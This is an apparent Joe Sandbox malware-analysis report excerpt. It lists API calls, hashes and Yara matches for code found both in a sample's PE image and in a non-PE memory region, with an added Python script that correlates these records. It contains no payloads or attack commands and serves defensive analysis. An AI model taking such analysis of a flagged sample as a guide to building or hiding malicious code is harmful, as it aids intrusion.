                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 01E0B635000548EFCF626F55DD08A5A7B6AEB86B46F104029FA058B636CB36DA42DE44
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.4623292394.00000000024C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024C0000, based on PE: false
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_24c0000_rHrG691f7q.jbxd
                                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                    • String ID: .$GetProcAddress.$l
                                                                                                                                                                                                                                                                    • API String ID: 0-2784972518
                                                                                                                                                                                                                                                                    • Opcode ID: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
                                                                                                                                                                                                                                                                    • Instruction ID: 3cf85c9df842f6fd3bc5ce3c7d3ca3eea59eed0ec6bfa2d80cc57b71e0b954be
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: A63137B6900609DFDB50CF99C880BAEBBF9FF48324F24504AD441A7310D771EA45CBA4
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.4622755016.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_rHrG691f7q.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                    • String ID: /
                                                                                                                                                                                                                                                                    • API String ID: 0-2043925204
                                                                                                                                                                                                                                                                    • Opcode ID: 9f35882ade819549731607cbebdcf7e443c3af80474b374bb13d2dd880a55ca5
                                                                                                                                                                                                                                                                    • Instruction ID: b1d1c733bd69e792f2c7091433d2a564ecb1a1065cd437496777377bd66813c7
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 9f35882ade819549731607cbebdcf7e443c3af80474b374bb13d2dd880a55ca5
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 1A412B725003196FCB20AFB9DC49EBBB778EB88714F50566EF905D7280EA34AD41CB58
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.4623292394.00000000024C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024C0000, based on PE: false
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_24c0000_rHrG691f7q.jbxd
                                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                    • String ID: /
                                                                                                                                                                                                                                                                    • API String ID: 0-2043925204
                                                                                                                                                                                                                                                                    • Opcode ID: 214cb01e33ec6b9459e4b79cb8e50baccc65f9bab5c6278872b1ce9ffd0fa8ee
                                                                                                                                                                                                                                                                    • Instruction ID: ad229483c852d6ee53efb4250a4e7a18463872af32814c639ad588bae306cc34
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 214cb01e33ec6b9459e4b79cb8e50baccc65f9bab5c6278872b1ce9ffd0fa8ee
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 4A410876900219AEDB209FB9DC48EBB7779EFC4714F50466AFA05DB280E7319D41CB50
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    • GetLocaleInfoW.KERNEL32(00000000,00000002,00000000,?,20001004,?,20001004,?,00000002,?,?,00430213,?,00000004), ref: 00435213
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.4622755016.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_rHrG691f7q.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: InfoLocale
                                                                                                                                                                                                                                                                    • String ID: GetLocaleInfoEx
                                                                                                                                                                                                                                                                    • API String ID: 2299586839-2904428671
                                                                                                                                                                                                                                                                    • Opcode ID: 64730f8190c419499ef2262387837ca1d33de23438e6729a1ee39c968f658f2e
                                                                                                                                                                                                                                                                    • Instruction ID: 6c622d5e0ad0a6d1c05e93c1424bc95a701370efe176ef79413d4e55be9de99b
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 64730f8190c419499ef2262387837ca1d33de23438e6729a1ee39c968f658f2e
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 97F02B31680318BBDB016F51CC02F6F7B21EF18B02F10006BFC0567290DA799E20AADE
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.4623292394.00000000024C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024C0000, based on PE: false
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_24c0000_rHrG691f7q.jbxd
                                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                    • Opcode ID: 0f0c45cb1db73e70c4158069b4bc17042fea2514ea4053169c41fd5e4a69dae0
                                                                                                                                                                                                                                                                    • Instruction ID: 4ae49a95b7c64ba767fb8a5f99d323f3de115220bcbad79950cb378f6a254cf8
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 0f0c45cb1db73e70c4158069b4bc17042fea2514ea4053169c41fd5e4a69dae0
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 28022D71E002199BEF14CFA9C9906AEF7F1EF88325F15826AD91AE7340D731A945CB80
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    • NtdllDefWindowProc_W.NTDLL(?,?,?,?), ref: 024C262C
                                                                                                                                                                                                                                                                    • PostQuitMessage.USER32(00000000), ref: 024C27CA
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.4623292394.00000000024C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024C0000, based on PE: false
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_24c0000_rHrG691f7q.jbxd
                                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: MessageNtdllPostProc_QuitWindow
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID: 4264772764-0
                                                                                                                                                                                                                                                                    • Opcode ID: e934076550e84698602cd97162307a7d632c652edc7a108d85d40228a86a25f4
                                                                                                                                                                                                                                                                    • Instruction ID: 6ad3a08127dbb01a78909def9183aaaebec7daf78f3187a793ccfc0e069aa659
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: e934076550e84698602cd97162307a7d632c652edc7a108d85d40228a86a25f4
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5C412D25A6434095E730EFA5BC45B2633B0FF64B26F10252FD528CB2B2E3A28540C75E
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,00436CBA,?,?,00000008,?,?,0043F17B,00000000), ref: 00436EEC
Memory Dump Source
• Source File: 00000000.00000002.4622755016.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_rHrG691f7q.jbxd
Similarity
• API ID: ExceptionRaise
• String ID:
• API String ID: 3997070919-0
• Opcode ID: 48238cf6710726b9619f53d2e144ba1457a585c9b7e66ee0334f1f17764c4bba
• Instruction ID: 64e3da0580c1687aacde15a9aed21cd267913b72937e2db5c37d982a735c0e1f
• Opcode Fuzzy Hash: 48238cf6710726b9619f53d2e144ba1457a585c9b7e66ee0334f1f17764c4bba
• Instruction Fuzzy Hash: 69B17D35210609EFD714CF28C48AB657BE0FF09324F26D659E899CF2A1C339E992CB44
APIs
• RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,024F6F21,?,?,00000008,?,?,024FF3E2,00000000), ref: 024F7153
Memory Dump Source
• Source File: 00000000.00000002.4623292394.00000000024C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024C0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_24c0000_rHrG691f7q.jbxd
Yara matches
Similarity
• API ID: ExceptionRaise
• String ID:
• API String ID: 3997070919-0
• Opcode ID: 48238cf6710726b9619f53d2e144ba1457a585c9b7e66ee0334f1f17764c4bba
• Instruction ID: 6366081ffb8182c296b9658f943e77cf32c1c022f0677522e99c37241884c123
• Opcode Fuzzy Hash: 48238cf6710726b9619f53d2e144ba1457a585c9b7e66ee0334f1f17764c4bba
• Instruction Fuzzy Hash: E0B16D312106089FD755CF28C486B66BBE1FF85368F258659E99ACF3A1C339D992CF40
APIs
  • Part of subcall function 00431EDA: GetLastError.KERNEL32(?,?,0042DFE5,00457910,00000010), ref: 00431EDE
  • Part of subcall function 00431EDA: _free.LIBCMT ref: 00431F11
  • Part of subcall function 00431EDA: SetLastError.KERNEL32(00000000), ref: 00431F52
  • Part of subcall function 00431EDA: _free.LIBCMT ref: 00431F39
  • Part of subcall function 00431EDA: SetLastError.KERNEL32(00000000), ref: 00431F46
• GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0043B699
Memory Dump Source
• Source File: 00000000.00000002.4622755016.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_rHrG691f7q.jbxd
Similarity
• API ID: ErrorLast$_free$InfoLocale
• String ID:
• API String ID: 2955987475-0
• Opcode ID: 7810810a637c9db15668f97de096a3c7ef99c71437c6b6a4b8ea3eac9e26399b
• Instruction ID: d046272b768734764790121d12bbe36070ecd09619f9604c2cd6a0fe40238023
• Opcode Fuzzy Hash: 7810810a637c9db15668f97de096a3c7ef99c71437c6b6a4b8ea3eac9e26399b
• Instruction Fuzzy Hash: B421B67251020AABDB249E65CC42BBB73A8EF48314F10107BFE01D6281EB79DD44CB99
APIs
  • Part of subcall function 024F2141: GetLastError.KERNEL32(?,?,024EA9EC,?,00000000,?,024ECDE6,024C247E,00000000,?,00451F20), ref: 024F2145
  • Part of subcall function 024F2141: _free.LIBCMT ref: 024F2178
  • Part of subcall function 024F2141: SetLastError.KERNEL32(00000000,00000000,?,00451F20), ref: 024F21B9
  • Part of subcall function 024F2141: _free.LIBCMT ref: 024F21A0
  • Part of subcall function 024F2141: SetLastError.KERNEL32(00000000,00000000,?,00451F20), ref: 024F21AD
• GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 024FB900
Memory Dump Source
• Source File: 00000000.00000002.4623292394.00000000024C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024C0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_24c0000_rHrG691f7q.jbxd
Yara matches
Similarity
• API ID: ErrorLast$_free$InfoLocale
• String ID:
• API String ID: 2955987475-0
• Opcode ID: 8d1e0dff99db69fa77e1a690083a2ab2b0404bead7d8da99940a9befd189831e
• Instruction ID: 2c75188b5ff96f9cc0cf981139fa8a88b1d74d476f1b10bfc2653860193751ab
• Opcode Fuzzy Hash: 8d1e0dff99db69fa77e1a690083a2ab2b0404bead7d8da99940a9befd189831e
• Instruction Fuzzy Hash: 27218032A5020AABDF649E25DC41FBB77ADEB8A318F10017FEE01D6250EB79D945CB50
APIs
  • Part of subcall function 00431EDA: GetLastError.KERNEL32(?,?,0042DFE5,00457910,00000010), ref: 00431EDE
  • Part of subcall function 00431EDA: _free.LIBCMT ref: 00431F11
  • Part of subcall function 00431EDA: SetLastError.KERNEL32(00000000), ref: 00431F52
• EnumSystemLocalesW.KERNEL32(0043B3F5,00000001,00000000,?,004307B5,?,0043BA22,00000000,?,?,?), ref: 0043B33F
Memory Dump Source
• Source File: 00000000.00000002.4622755016.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_rHrG691f7q.jbxd
Similarity
• API ID: ErrorLast$EnumLocalesSystem_free
• String ID:
• API String ID: 2016158738-0
• Opcode ID: 209f9151615a4c87f00d4ea0f4f536091c38e7646036be2875dd2bb4f2ddf691
• Instruction ID: 7307f244e070286786186ca11be292e9958ff85af34fd5d1bf47ea8df294ed07
• Opcode Fuzzy Hash: 209f9151615a4c87f00d4ea0f4f536091c38e7646036be2875dd2bb4f2ddf691
• Instruction Fuzzy Hash: D91106362007019FDB189F3988917BBB791FF84318F15452DEA8687B40D375A902C784
APIs
  • Part of subcall function 024F2141: GetLastError.KERNEL32(?,?,024EA9EC,?,00000000,?,024ECDE6,024C247E,00000000,?,00451F20), ref: 024F2145
  • Part of subcall function 024F2141: _free.LIBCMT ref: 024F2178
  • Part of subcall function 024F2141: SetLastError.KERNEL32(00000000,00000000,?,00451F20), ref: 024F21B9
• EnumSystemLocalesW.KERNEL32(0043B3F5,00000001,00000000,?,024F0A1C,?,024FBC89,00000000,?,?,?), ref: 024FB5A6
Memory Dump Source
• Source File: 00000000.00000002.4623292394.00000000024C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024C0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_24c0000_rHrG691f7q.jbxd
Yara matches
Similarity
• API ID: ErrorLast$EnumLocalesSystem_free
• String ID:
• API String ID: 2016158738-0
• Opcode ID: ffafb835184771a8fee8a968cb960d5e6389dd898606227e18ebf87d931cb5f8
• Instruction ID: d707b3e806164541dfa077f739ff801c7fc3bc8b35c1c4102fec721b69519838
• Opcode Fuzzy Hash: ffafb835184771a8fee8a968cb960d5e6389dd898606227e18ebf87d931cb5f8
• Instruction Fuzzy Hash: 9311E93A2007059FDB189F39C8A167BBB92FFC575CB15442DDA4687B40D775B542CB40
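The function records above come in pairs across the two memory dumps, the PE-backed image at offset 00400000 and the non-PE region at 024C0000: the two RaiseException copies share an Opcode ID but have different Instruction IDs, whereas the GetLocaleInfoW and EnumSystemLocalesW copies agree only on their API ID, and the EnumSystemLocalesW copy at 024FB5A6 still passes the callback 0043B3F5 that lies in the 00400000 image. The script below is an added example, not Joe Sandbox's code: it parses records in this report layout (layout lines such as "Memory Dump Source" are skipped, so the full page text parses the same way), groups them by API ID, reports which dumps hold a copy and whether the copies share an opcode hash, and flags call arguments from records outside an assumed image range that point into it. The image range 0x400000..0x500000 used in the usage call is this example's assumption; the page does not state the image size.

```python
"""Parse Joe Sandbox per-function records and correlate them across memory dumps.
Added example for this page, not Joe Sandbox code; only the field names come from the report."""
import re
from collections import defaultdict

# Constructed input: six records copied from this page, trimmed to the lines the parser reads.
SAMPLE = """\
APIs
• Source File: 00000000.00000002.4622755016.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• API ID: ExceptionRaise
• Opcode ID: 48238cf6710726b9619f53d2e144ba1457a585c9b7e66ee0334f1f17764c4bba
APIs
• RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,024F6F21,?,?,00000008,?,?,024FF3E2,00000000), ref: 024F7153
• Source File: 00000000.00000002.4623292394.00000000024C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024C0000, based on PE: false
• API ID: ExceptionRaise
• Opcode ID: 48238cf6710726b9619f53d2e144ba1457a585c9b7e66ee0334f1f17764c4bba
APIs
  • Part of subcall function 00431EDA: GetLastError.KERNEL32(?,?,0042DFE5,00457910,00000010), ref: 00431EDE
  • Part of subcall function 00431EDA: _free.LIBCMT ref: 00431F11
• GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0043B699
• Source File: 00000000.00000002.4622755016.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• API ID: ErrorLast$_free$InfoLocale
• Opcode ID: 7810810a637c9db15668f97de096a3c7ef99c71437c6b6a4b8ea3eac9e26399b
APIs
• GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 024FB900
• Source File: 00000000.00000002.4623292394.00000000024C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024C0000, based on PE: false
• API ID: ErrorLast$_free$InfoLocale
• Opcode ID: 8d1e0dff99db69fa77e1a690083a2ab2b0404bead7d8da99940a9befd189831e
APIs
• EnumSystemLocalesW.KERNEL32(0043B3F5,00000001,00000000,?,004307B5,?,0043BA22,00000000,?,?,?), ref: 0043B33F
• Source File: 00000000.00000002.4622755016.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• API ID: ErrorLast$EnumLocalesSystem_free
• Opcode ID: 209f9151615a4c87f00d4ea0f4f536091c38e7646036be2875dd2bb4f2ddf691
APIs
• EnumSystemLocalesW.KERNEL32(0043B3F5,00000001,00000000,?,024F0A1C,?,024FBC89,00000000,?,?,?), ref: 024FB5A6
• Source File: 00000000.00000002.4623292394.00000000024C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024C0000, based on PE: false
• API ID: ErrorLast$EnumLocalesSystem_free
• Opcode ID: ffafb835184771a8fee8a968cb960d5e6389dd898606227e18ebf87d931cb5f8
"""

FIELD = re.compile(r"^\s*•\s*(Source File|API ID|Opcode ID|Instruction ID):\s*(.*)$")
SOURCE = re.compile(r"Offset:\s*([0-9A-Fa-f]+),\s*based on PE:\s*(true|false)")
SUBCALL = re.compile(r"^\s*•\s*Part of subcall function ([0-9A-Fa-f]+):\s*(.*)$")
CALL = re.compile(r"^\s*•?\s*(\w+)\.(\w+)(?:\((.*)\))?,?\s*ref:\s*([0-9A-Fa-f]+)\s*$")


def parse_records(text):
    """One dict per record; a record starts at an 'APIs' line. Unknown lines are skipped."""
    records, cur = [], None
    for line in text.splitlines():
        if line.strip() == "APIs":
            cur = {"calls": []}
            records.append(cur)
            continue
        if cur is None:
            continue
        via, m = None, SUBCALL.match(line)
        if m:  # call observed inside a callee, not in the record's own body
            via, line = int(m.group(1), 16), m.group(2)
        m = FIELD.match(line)
        if m:
            key, val = m.group(1), m.group(2).strip()
            if key == "Source File":
                s = SOURCE.search(val)
                cur["offset"], cur["pe_backed"] = int(s.group(1), 16), s.group(2) == "true"
            else:
                cur[key.lower().replace(" ", "_")] = val
            continue
        m = CALL.match(line)
        if m:  # Name.MODULE(args), ref: addr   or   Name.MODULE ref: addr
            args = [a.strip() for a in m.group(3).split(",")] if m.group(3) else []
            cur["calls"].append({"api": m.group(1), "module": m.group(2), "args": args,
                                 "ref": int(m.group(4), 16), "via": via})
    return records


def correlate(records):
    """Group by API ID (the call-profile key of the report's Similarity block).
    Per group: dump offsets holding a copy, and whether every copy shares one Opcode ID."""
    groups = defaultdict(list)
    for r in records:
        groups[r.get("api_id", "")].append(r)
    return {api: {"offsets": sorted({r["offset"] for r in g}),
                  "exact_opcode_match": len(g) > 1 and len({r.get("opcode_id") for r in g}) == 1}
            for api, g in groups.items()}


def pointers_into(records, base, size):
    """Call arguments from records outside [base, base+size) that point into that range,
    e.g. a relocated copy still passing a callback that lives in the original image.
    base/size are the caller's assumption about the image range."""
    hits = []
    for r in records:
        if base <= r["offset"] < base + size:
            continue
        for c in r["calls"]:
            for a in c["args"]:
                if re.fullmatch(r"[0-9A-Fa-f]{8}", a) and base <= int(a, 16) < base + size:
                    hits.append((c["api"], c["ref"], int(a, 16)))
    return hits


if __name__ == "__main__":
    recs = parse_records(SAMPLE)
    for api, info in correlate(recs).items():
        print(api, [hex(o) for o in info["offsets"]], "same opcodes:", info["exact_opcode_match"])
    for api, ref, target in pointers_into(recs, 0x400000, 0x100000):  # assumed image range
        print(f"{api} at {ref:08X} passes {target:08X}, inside the assumed 0x400000 image")
```

Run against the whole report text instead of SAMPLE, the same three functions give a quick triage view of which functions the non-PE region duplicates from the main image byte-for-byte (same Opcode ID) and which only resemble it by call profile; the pointer check is the one to extend with the real image size from the PE header rather than the assumed 1 MiB.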
APIs
  • Part of subcall function 00431EDA: GetLastError.KERNEL32(?,?,0042DFE5,00457910,00000010), ref: 00431EDE
  • Part of subcall function 00431EDA: _free.LIBCMT ref: 00431F11
  • Part of subcall function 00431EDA: SetLastError.KERNEL32(00000000), ref: 00431F52
• GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,0043B613,00000000,00000000,?), ref: 0043B8A1
Memory Dump Source
• Source File: 00000000.00000002.4622755016.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_rHrG691f7q.jbxd
Similarity
• API ID: ErrorLast$InfoLocale_free
• String ID:
• API String ID: 787680540-0
APIs
  • Part of subcall function 024F2141: GetLastError.KERNEL32(?,?,024EA9EC,?,00000000,?,024ECDE6,024C247E,00000000,?,00451F20), ref: 024F2145
  • Part of subcall function 024F2141: _free.LIBCMT ref: 024F2178
  • Part of subcall function 024F2141: SetLastError.KERNEL32(00000000,00000000,?,00451F20), ref: 024F21B9
• GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,024FB87A,00000000,00000000,?), ref: 024FBB08
Memory Dump Source
• Source File: 00000000.00000002.4623292394.00000000024C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024C0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_24c0000_rHrG691f7q.jbxd
Yara matches
Similarity
• API ID: ErrorLast$InfoLocale_free
• String ID:
• API String ID: 787680540-0
APIs
  • Part of subcall function 00431EDA: GetLastError.KERNEL32(?,?,0042DFE5,00457910,00000010), ref: 00431EDE
  • Part of subcall function 00431EDA: _free.LIBCMT ref: 00431F11
  • Part of subcall function 00431EDA: SetLastError.KERNEL32(00000000), ref: 00431F52
• EnumSystemLocalesW.KERNEL32(0043B645,00000001,?,?,004307B5,?,0043B9E6,004307B5,?,?,?,?,?,004307B5,?,?), ref: 0043B3B4
Memory Dump Source
• Source File: 00000000.00000002.4622755016.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_rHrG691f7q.jbxd
Similarity
• API ID: ErrorLast$EnumLocalesSystem_free
• String ID:
• API String ID: 2016158738-0
APIs
  • Part of subcall function 024F2141: GetLastError.KERNEL32(?,?,024EA9EC,?,00000000,?,024ECDE6,024C247E,00000000,?,00451F20), ref: 024F2145
  • Part of subcall function 024F2141: _free.LIBCMT ref: 024F2178
  • Part of subcall function 024F2141: SetLastError.KERNEL32(00000000,00000000,?,00451F20), ref: 024F21B9
• EnumSystemLocalesW.KERNEL32(0043B645,00000001,?,?,024F0A1C,?,024FBC4D,024F0A1C,?,?,?,?,?,024F0A1C,?,?), ref: 024FB61B
Memory Dump Source
• Source File: 00000000.00000002.4623292394.00000000024C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024C0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_24c0000_rHrG691f7q.jbxd
Yara matches
Similarity
• API ID: ErrorLast$EnumLocalesSystem_free
• String ID:
• API String ID: 2016158738-0
APIs
• GetLocaleInfoW.KERNEL32(00000000,00000002,00000000,?,20001004,?,20001004,?,00000002,?,?,024F047A,?,00000004), ref: 024F547A
Memory Dump Source
• Source File: 00000000.00000002.4623292394.00000000024C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024C0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_24c0000_rHrG691f7q.jbxd
Yara matches
Similarity
• API ID: InfoLocale
• String ID:
• API String ID: 2299586839-0
APIs
  • Part of subcall function 0042E3ED: EnterCriticalSection.KERNEL32(?,?,00431C7A,?,00457A38,00000008,00431D48,?,?,?), ref: 0042E3FC
• EnumSystemLocalesW.KERNEL32(00434D87,00000001,00457BB8,0000000C), ref: 00434E05
Memory Dump Source
• Source File: 00000000.00000002.4622755016.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_rHrG691f7q.jbxd
Similarity
• API ID: CriticalEnterEnumLocalesSectionSystem
• String ID:
• API String ID: 1272433827-0
APIs
  • Part of subcall function 024EE654: RtlEnterCriticalSection.NTDLL(02070DAF), ref: 024EE663
• EnumSystemLocalesW.KERNEL32(00434D87,00000001,00457BB8,0000000C), ref: 024F506C
Memory Dump Source
• Source File: 00000000.00000002.4623292394.00000000024C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024C0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_24c0000_rHrG691f7q.jbxd
Yara matches
Similarity
• API ID: CriticalEnterEnumLocalesSectionSystem
• String ID:
• API String ID: 1272433827-0
                                                                                                                                                                                                                                                                    • Opcode ID: 149a1b447c4ca571c705eb83a82105c6c8b5f7f3924206eb96c0dadbe136b747
                                                                                                                                                                                                                                                                    • Instruction ID: eb4735233013f534b63ada52e05664a4d822d9e8a6e3a35913ff8f234af06f75
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 149a1b447c4ca571c705eb83a82105c6c8b5f7f3924206eb96c0dadbe136b747
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: FBF08C32A10300DFEB10EF69D801B4C77E1AF05722F10416AF900DB2A1C77589448F4A
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                      • Part of subcall function 00431EDA: GetLastError.KERNEL32(?,?,0042DFE5,00457910,00000010), ref: 00431EDE
                                                                                                                                                                                                                                                                      • Part of subcall function 00431EDA: _free.LIBCMT ref: 00431F11
                                                                                                                                                                                                                                                                      • Part of subcall function 00431EDA: SetLastError.KERNEL32(00000000), ref: 00431F52
                                                                                                                                                                                                                                                                    • EnumSystemLocalesW.KERNEL32(0043B1D9,00000001,?,?,?,0043BA44,004307B5,?,?,?,?,?,004307B5,?,?,?), ref: 0043B2B9
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.4622755016.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_rHrG691f7q.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: ErrorLast$EnumLocalesSystem_free
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID: 2016158738-0
                                                                                                                                                                                                                                                                    • Opcode ID: d795fd725da8cf926aceeb2c3e7fa24b7794cc6b9bd948e6377232035fe4f002
                                                                                                                                                                                                                                                                    • Instruction ID: ec76e124c96d5fb6d75208995366108955e3ecd697e122142a5eb02f601840fd
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: d795fd725da8cf926aceeb2c3e7fa24b7794cc6b9bd948e6377232035fe4f002
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: C8F0553A30020897CB089F7BE81976BBF90EFC5754F0A409EEF098B290C3399942C794
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                      • Part of subcall function 024F2141: GetLastError.KERNEL32(?,?,024EA9EC,?,00000000,?,024ECDE6,024C247E,00000000,?,00451F20), ref: 024F2145
                                                                                                                                                                                                                                                                      • Part of subcall function 024F2141: _free.LIBCMT ref: 024F2178
                                                                                                                                                                                                                                                                      • Part of subcall function 024F2141: SetLastError.KERNEL32(00000000,00000000,?,00451F20), ref: 024F21B9
                                                                                                                                                                                                                                                                    • EnumSystemLocalesW.KERNEL32(0043B1D9,00000001,?,?,?,024FBCAB,024F0A1C,?,?,?,?,?,024F0A1C,?,?,?), ref: 024FB520
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.4623292394.00000000024C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024C0000, based on PE: false
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_24c0000_rHrG691f7q.jbxd
                                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: ErrorLast$EnumLocalesSystem_free
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID: 2016158738-0
                                                                                                                                                                                                                                                                    • Opcode ID: 17a3dc99c73c840853923c14692af3efa017a2bf6fb03d58d7281da58e8ea8e8
